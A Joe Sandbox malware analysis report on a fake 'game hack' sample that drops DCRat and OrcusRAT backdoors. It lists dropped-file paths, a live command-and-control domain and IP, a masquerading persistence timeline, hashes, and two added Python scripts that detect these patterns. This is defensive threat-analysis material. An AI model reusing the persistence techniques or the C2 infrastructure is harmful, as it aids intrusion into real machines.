GameHackBuild1.exe.bin.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.Uztuby
GameHackBuild1.exe.bin.exe | 100% | Joe Sandbox ML |
                      SourceDetectionScannerLabelLink
                      C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe100%AviraTR/Dropper.Gen
                      C:\Users\Default\Pictures\RuntimeBroker.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%AviraHEUR/AGEN.1323984
                      C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe100%AviraHEUR/AGEN.1309946
                      C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe100%AviraVBS/Runner.VPG
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe100%AviraVBS/Runner.VPG
                      C:\Users\user\AppData\Local\Temp\B2ESObyLKs.bat100%AviraBAT/Delbat.C
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe100%AviraHEUR/AGEN.1309946
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%AviraHEUR/AGEN.1323984
                      C:\Users\user\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe100%AviraVBS/Runner.VPG
                      C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Users\Default\Pictures\RuntimeBroker.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\MSBuild\SSblKNNQege.exe100%Joe Sandbox ML
C:\Program Files (x86)\MSBuild\SSblKNNQege.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Program Files (x86)\Microsoft Office\SSblKNNQege.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\SSblKNNQege.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\Microsoft\SSblKNNQege.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\Windows Portable Devices\SSblKNNQege.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\ProgramData\WindowsHolographicDevices\SSblKNNQege.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\SSblKNNQege.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SSblKNNQege.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Users\Default\Pictures\RuntimeBroker.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.ZmutzyLscpt
C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | 84% | ReversingLabs | ByteCode-MSIL.Trojan.OrcusRAT
C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe | 58% | ReversingLabs | Win64.Trojan.Ulise
C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | 84% | ReversingLabs | ByteCode-MSIL.Trojan.OrcusRAT
C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Users\user\Desktop\BpJZMyRc.log | 29% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\Desktop\ErvIhhWY.log | 33% | ReversingLabs | Win32.Ransomware.Bitpy
C:\Users\user\Desktop\PxMOoBdB.log | 25% | ReversingLabs | (no label)
C:\Users\user\Desktop\QLuoYXmy.log | 4% | ReversingLabs | (no label)
C:\Users\user\Desktop\WmQvmhxk.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\brpMezGb.log | 8% | ReversingLabs | (no label)
C:\Users\user\Desktop\jdhUscxN.log | 3% | ReversingLabs | (no label)
C:\Users\user\Desktop\mOMkzqHG.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\syFrxmlp.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\wowiEjmi.log | 9% | ReversingLabs | (no label)
C:\Windows\Cursors\OfficeClickToRun.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Windows\L2Schemas\SSblKNNQege.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
C:\Windows\security\database\SSblKNNQege.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
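Three patterns in the dropped-file table above are worth turning into a triage check rather than reading by eye: one payload name (SSblKNNQege.exe) scattered across a dozen system and Program Files directories, binaries carrying legitimate Windows names (RuntimeBroker.exe, OfficeClickToRun.exe) sitting outside the directories those names belong to, and files with a .log extension that scanners classify as .NET PE trojans. The script below is an added example written for this page, not part of the Joe Sandbox report or of its tooling. It works on a subset of the rows transcribed from the table (a constructed input). The expected home directories for the two Windows binaries, the label prefixes treated as PE verdicts and the set of "normal" PE extensions are assumptions stated in the code, not facts the report provides.

```python
from collections import Counter, defaultdict
from pathlib import PureWindowsPath

# Constructed input: a subset of the rows transcribed from the dropped-file
# table, as (path, ReversingLabs detection %, label or None when no family named).
DROPPED = [
    (r"C:\Program Files (x86)\MSBuild\SSblKNNQege.exe", 78, "ByteCode-MSIL.Backdoor.DCRat"),
    (r"C:\Recovery\SSblKNNQege.exe", 78, "ByteCode-MSIL.Backdoor.DCRat"),
    (r"C:\Windows\L2Schemas\SSblKNNQege.exe", 78, "ByteCode-MSIL.Backdoor.DCRat"),
    (r"C:\Users\Default\Pictures\RuntimeBroker.exe", 78, "ByteCode-MSIL.Backdoor.DCRat"),
    (r"C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe", 78, "ByteCode-MSIL.Backdoor.DCRat"),
    (r"C:\Windows\Cursors\OfficeClickToRun.exe", 68, "ByteCode-MSIL.Backdoor.DCRat"),
    (r"C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe", 84, "ByteCode-MSIL.Trojan.OrcusRAT"),
    (r"C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe", 58, "Win64.Trojan.Ulise"),
    (r"C:\Users\user\Desktop\PxMOoBdB.log", 25, None),
    (r"C:\Users\user\Desktop\WmQvmhxk.log", 71, "ByteCode-MSIL.Trojan.DCRat"),
]

# Assumption (not from the report): where these Windows binaries legitimately live.
EXPECTED_DIRS = {
    "runtimebroker.exe": {"c:\\windows\\system32"},
    "officeclicktorun.exe": {"c:\\program files\\common files\\microsoft shared\\clicktorun"},
}
# Assumption: label prefixes that denote a PE verdict, and extensions a PE is normally dropped under.
PE_LABEL_PREFIXES = ("ByteCode-MSIL.", "Win32.", "Win64.")
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".com"}


def is_masquerading(path):
    """True when a known system binary name sits outside its expected directory."""
    p = PureWindowsPath(path)
    expected = EXPECTED_DIRS.get(p.name.lower())
    return expected is not None and str(p.parent).lower() not in expected


def is_disguised_pe(path, label):
    """True when the scanner verdict implies a PE but the file name does not."""
    return (bool(label) and label.startswith(PE_LABEL_PREFIXES)
            and PureWindowsPath(path).suffix.lower() not in PE_EXTENSIONS)


def triage(rows):
    families = Counter(label or "(no family named)" for _, _, label in rows)
    copies = defaultdict(set)                      # basename -> directories it was dropped into
    for path, _, _ in rows:
        p = PureWindowsPath(path)
        copies[p.name].add(str(p.parent))
    return {
        "families": families,
        "copies_by_name": {name: sorted(dirs) for name, dirs in copies.items()},
        "masquerades": [path for path, _, _ in rows if is_masquerading(path)],
        "disguised_pe": [path for path, _, label in rows if is_disguised_pe(path, label)],
    }


if __name__ == "__main__":
    result = triage(DROPPED)
    for name, dirs in result["copies_by_name"].items():
        if len(dirs) > 1:
            print(f"{name} dropped into {len(dirs)} directories")
    for path in result["masquerades"]:
        print("system name in unexpected location:", path)
    for path in result["disguised_pe"]:
        print("PE verdict on non-executable extension:", path)
```

The same-name-many-directories and masquerade checks are what you would run against a host's filesystem listing or an EDR file-creation feed during an incident, using the table's paths as the seed. One caveat when reading this report: the analysis whitelist in the Cookbook Comments excludes processes named OfficeClickToRun.exe and RuntimeBroker.exe by name, which are exactly the names the dropped copies use, so behaviour from those copies may be absent from the process-level sections.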
                      No Antivirus matches
                      No Antivirus matches
Source | Detection | Scanner | Label
http://www.w3.or/XmasIes | 0% | Avira URL Cloud | safe
https://taskscheduler.codeplex.com/F | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
25350.client.sudorat.top | 185.37.62.158 | true | true | (none) | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://taskscheduler.codeplex.com/ | MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1366464067.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000041DA000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://api.ipify.org/I(. | GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://schemas.xmlsoap.org/soap/encoding/ | MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002949000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.000000000316A000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.00000000031C9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://www.w3.or/XmasIes | MpDefenderProtector.exe, 00000007.00000002.1311661641.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, runtimesvc.exe, 00000017.00000002.1874336688.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, containerRuntime.exe, 0000001A.00000002.1720636580.00000000025B1000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://taskscheduler.codeplex.com/F | MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1366464067.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000041DA000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002949000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.000000000316A000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.00000000031C9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.37.62.158 | 25350.client.sudorat.top | Russian Federation | 62082 | HOSTLANDRU | true
                                  IP
                                  127.0.0.1
                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1590018
                                  Start date and time:2025-01-13 13:34:14 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 10m 35s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:48
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:GameHackBuild1.exe.bin.exe
                                  Detection:MAL
                                  Classification:mal100.spre.troj.spyw.expl.evad.winEXE@62/65@1/2
                                  EGA Information:
                                  • Successful, ratio: 66.7%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 273
                                  • Number of non-executed functions: 146
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, audiodg.exe, OfficeClickToRun.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, schtasks.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.253.45, 2.23.242.162, 4.175.87.197
                                  • Excluded domains from analysis (whitelisted): 729231cm.n9shteam1.top, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, 117813cm.n9shteam.in, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target MpDefenderCoreProtion.exe, PID 5456 because it is empty
                                  • Execution Graph export aborted for target Solara.exe, PID 7648 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
07:35:18 | API Interceptor | 6x Sleep call for process: Solara.exe modified
07:35:22 | API Interceptor | 56x Sleep call for process: RegAsm.exe modified
07:35:24 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
08:38:30 | API Interceptor | 48x Sleep call for process: runtimesvc.exe modified
13:35:20 | Task Scheduler | Run new task: MpDefenderProtector path: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
13:35:28 | Task Scheduler | Run new task: OfficeClickToRunO path: "C:\Windows\Cursors\OfficeClickToRun.exe"
13:35:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SSblKNNQege "C:\Program Files (x86)\msbuild\SSblKNNQege.exe"
13:35:32 | Task Scheduler | Run new task: OfficeClickToRun path: "C:\Windows\Cursors\OfficeClickToRun.exe"
13:35:32 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe"
13:35:32 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe"
13:35:33 | Task Scheduler | Run new task: SSblKNNQege path: "C:\Program Files (x86)\msbuild\SSblKNNQege.exe"
13:35:33 | Task Scheduler | Run new task: SSblKNNQegeS path: "C:\Windows\L2Schemas\SSblKNNQege.exe"
14:38:12 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Default\Pictures\RuntimeBroker.exe"
14:38:25 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Windows\Cursors\OfficeClickToRun.exe"
14:38:31 | Task Scheduler | Run new task: runtimesvcr path: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe"
14:38:35 | Task Scheduler | Run new task: runtimesvc path: "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe"
14:38:40 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run runtimesvc "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe"
14:38:50 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SSblKNNQege "C:\Windows\security\database\SSblKNNQege.exe"
14:38:58 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Default\Pictures\RuntimeBroker.exe"
14:39:08 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Windows\Cursors\OfficeClickToRun.exe"
14:39:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run runtimesvc "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe"
14:39:24 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SSblKNNQege "C:\Windows\security\database\SSblKNNQege.exe"
14:39:32 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Default\Pictures\RuntimeBroker.exe"
14:39:40 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Windows\Cursors\OfficeClickToRun.exe"
14:39:49 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run runtimesvc "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe"
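The timeline above shows the persistence layout this sample builds: scheduled tasks created in pairs whose names differ by one trailing character (OfficeClickToRun / OfficeClickToRunO, RuntimeBroker / RuntimeBrokerR, SSblKNNQege / SSblKNNQegeS, runtimesvc / runtimesvcr), the same Run value name written under HKCU, HKCU64 and HKLM64, and images placed under C:\Windows subdirectories that never hold executables (Cursors, L2Schemas, security\database, SoftwareDistribution\Download) or under AppData\Roaming and C:\Users\Default. The script below is an added example written for this page, not part of the Joe Sandbox report, that parses a subset of those timeline lines (constructed input, in the run-together form the report uses) and applies three detection rules. The lists of user-writable folders and of the Windows directories that legitimately hold executables are assumptions stated in the code; they are the kind of allow-list a hunt query or Sigma rule would carry, not something the report specifies.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed input: a subset of the Task Scheduler / Autostart timeline lines,
# exactly as the report runs the time, type and description together.
TIMELINE = [
    r'13:35:20Task SchedulerRun new task: MpDefenderProtector path: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe',
    r'13:35:28Task SchedulerRun new task: OfficeClickToRunO path: "C:\Windows\Cursors\OfficeClickToRun.exe"',
    r'13:35:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SSblKNNQege "C:\Program Files (x86)\msbuild\SSblKNNQege.exe"',
    r'13:35:32Task SchedulerRun new task: OfficeClickToRun path: "C:\Windows\Cursors\OfficeClickToRun.exe"',
    r'13:35:32Task SchedulerRun new task: RuntimeBroker path: "C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe"',
    r'13:35:32Task SchedulerRun new task: RuntimeBrokerR path: "C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe"',
    r'13:35:33Task SchedulerRun new task: SSblKNNQege path: "C:\Program Files (x86)\msbuild\SSblKNNQege.exe"',
    r'13:35:33Task SchedulerRun new task: SSblKNNQegeS path: "C:\Windows\L2Schemas\SSblKNNQege.exe"',
    r'14:38:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run runtimesvc "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe"',
    r'14:38:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SSblKNNQege "C:\Windows\security\database\SSblKNNQege.exe"',
    r'14:39:24AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SSblKNNQege "C:\Windows\security\database\SSblKNNQege.exe"',
]

TASK_RE = re.compile(r'^(?P<time>\d\d:\d\d:\d\d)Task SchedulerRun new task: (?P<name>\S+) path: "?(?P<path>[^"]+)"?$')
RUN_RE = re.compile(r'^(?P<time>\d\d:\d\d:\d\d)AutostartRun: (?P<key>\S+) (?P<name>\S+) "(?P<path>[^"]+)"$')

# Assumed allow/deny lists (not from the report): folders a legitimate
# autostart image should not live in, and the only C:\Windows subtrees that hold executables.
USER_WRITABLE_PREFIXES = ("c:\\users\\default\\", "c:\\users\\public\\", "c:\\programdata\\",
                          "c:\\recovery\\", "c:\\windows\\temp\\")
USER_WRITABLE_PARTS = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\")
WINDOWS_EXE_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")


def parse_event(line):
    """Return a dict for a Task Scheduler or Autostart line, None for any other line type."""
    m = TASK_RE.match(line)
    if m:
        return {"time": m["time"], "kind": "task", "name": m["name"], "path": m["path"], "hive": None}
    m = RUN_RE.match(line)
    if m:
        return {"time": m["time"], "kind": "runkey", "name": m["name"], "path": m["path"],
                "hive": m["key"].split("\\")[0]}      # HKCU, HKCU64, HKLM64 ...
    return None


def path_reasons(path):
    """Rules that look only at where the autostart image lives."""
    p = path.lower()
    reasons = []
    if p.startswith(USER_WRITABLE_PREFIXES) or any(part in p for part in USER_WRITABLE_PARTS):
        reasons.append("image in user-writable or unusual folder")
    if p.startswith("c:\\windows\\") and not p.startswith(WINDOWS_EXE_DIRS):
        reasons.append("image under C:\\Windows outside System32/SysWOW64/WinSxS")
    return reasons


def analyse(lines):
    events = [e for e in map(parse_event, lines) if e]
    tasks = {e["name"]: e for e in events if e["kind"] == "task"}
    hives = defaultdict(set)                          # Run value name -> hives it was written to
    for e in events:
        if e["kind"] == "runkey":
            hives[e["name"]].add(e["hive"])
    findings = []
    for e in events:
        reasons = path_reasons(e["path"])
        if e["kind"] == "task":
            # Pair rule: <name> and <name>+one character launching the same binary.
            twin = tasks.get(e["name"][:-1])
            if twin and PureWindowsPath(twin["path"]).name.lower() == PureWindowsPath(e["path"]).name.lower():
                reasons.append(f"duplicate of task {twin['name']!r} with one extra character")
        elif len(hives[e["name"]]) > 1:
            reasons.append("same Run value in " + ", ".join(sorted(hives[e["name"]])))
        if reasons:
            findings.append({**e, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyse(TIMELINE):
        print(f"{f['time']} {f['kind']:7} {f['name']:20} {f['path']}")
        for r in f["reasons"]:
            print("    -", r)
```

Note what the folder rules alone miss: the task SSblKNNQege pointing at C:\Program Files (x86)\msbuild\SSblKNNQege.exe raises nothing, because Program Files is a plausible home for an executable; it only surfaces through its twin SSblKNNQegeS and through the Run value of the same name being written to three hives. On a live host the same three rules apply to the output of schtasks /query /v /fo csv and to the HKCU and HKLM Run keys read from both registry views.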
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.37.62.158 | Wave.exe | malicious | Discord Token Stealer, Orcus, SugarDump |
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HOSTLANDRU | 9vt8NMgLXF.exe | malicious | FormBook | 185.26.122.70
HOSTLANDRU | TEKLİF İST.exe | malicious | FormBook | 185.26.122.70
HOSTLANDRU | hbwebdownload - MT 103.exe | malicious | FormBook | 185.26.122.70
HOSTLANDRU | docs.exe | malicious | FormBook | 185.26.122.70
HOSTLANDRU | Dekont.exe | malicious | FormBook | 185.26.122.70
HOSTLANDRU | Wave.exe | malicious | Discord Token Stealer, Orcus, SugarDump | 185.37.62.158
HOSTLANDRU | DFpUKTL6kg.exe | malicious | DCRat | 185.26.122.81
HOSTLANDRU | http://mydpd.space/ | malicious | DCRat, PureLog Stealer | 185.26.122.30
HOSTLANDRU | HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | malicious | DCRat | 185.26.122.79
HOSTLANDRU | yk2Eh24FDd.exe | malicious | Unknown | 185.26.122.81
                                    No context
                                    No context
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):194
                                    Entropy (8bit):5.635413457486011
                                    Encrypted:false
                                    SSDEEP:6:CcmWVoklcyshDQZNFoSuP/ISxmXdBQdVg2c:uOsG/oSuHPxeXN
